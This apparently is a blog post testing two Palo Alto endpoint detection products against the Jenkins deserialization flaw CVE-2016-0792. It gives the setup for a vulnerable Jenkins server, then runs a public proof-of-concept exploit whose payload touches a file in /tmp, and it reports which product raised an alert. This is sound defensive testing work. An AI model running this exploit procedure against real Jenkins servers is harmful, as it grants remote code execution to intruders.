Testing Endpoint Detection Response Products
This is the first of many posts on how to test your Endpoint Detection Response product by using real world scenarios.
Products that are being tested
I am testing two products today:
- Palo Alto Prisma Cloud Host Defender (Twistlock’s Endpoint Detection Response product)
- Palto Alto XDR Agent for Linux
Jenkins Exploit Information (CVE-2016-0792)
CVE-2016-0792 refers to a vulnerability in Jenkins (continuous integration tool) before versions 1.650 and LTS before 1.642.2 and allows remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.
Setting up your Environment
I will be covering a two machine scenario (victim and attacker). The victim machine will have the vulnerable version of Jenkins and the attacker machine will be running the exploit.
Victim Machine Setup
# Environment Setup for CVE-2016-0792 # # Multiple unspecified API endpoints in Jenkins # before 1.650 and LTS before 1.642.2 allow remote authenticated users to # execute arbitrary code via serialized data in an XML file, # related to XStream and groovy.util.Expando. # # O/S: Ubuntu 18.04 # Jenkins Version 1.609.3 # Known Exploit # From Host (vulnerable machine) # # Prerequisite packages # Download Java 7 JDK curl -L -O -k https://files-cdn.liferay.com/mirrors/download.oracle.com/otn-pub/java/jdk/7u80-b15/jdk-7u80-linux-x64.rpm # convert rpm to deb apt-get install alien netcat developer-tools sudo alien --scripts jdk-7u80-linux-x64.rpm # install java 7 deb dpkg -i jdk_1.7.080-1_amd64.deb # Create Jenkins User useradd jenkins mkdir /home/jenkins mkdir /opt/jenkins chown -R jenkins:jenkins /home/jenkins mkhomedir_helper jenkins # Download and run Jenkins cd /opt/jenkins curl -L -k -O https://get.jenkins.io/war-stable/1.609.3/jenkins.war java -jar jenkins.war
I am using MacOS Montery but any machine with Python3 will work
The proof of concept code was found on github and was written by jpiechowka.
pip3 install requests git clone https://github.com/jpiechowka/jenkins-cve-2016-0792 cd jenkins-cve-2016-0792
You will need to replace <serverip> with the IP address of server you are trying to exploit
This example touches a file located at /tmp/file_write. The exploit proof of concept code has an issue with special characters so my example will not use them. The command below (touch) works fine and proves that we have code execution.
python3 from exploit import exploit exploit('http://<serverip>:8080/', '/usr/bin/touch /tmp/file_write')
Each product tested was configured with the highest possible settings for detection.
Response Testings Results
Prisma Cloud Host Defender
Did not detect or alert
Palo Alto XDR Linux Host Agent
Detected a “Suspicious Input Deserialization” event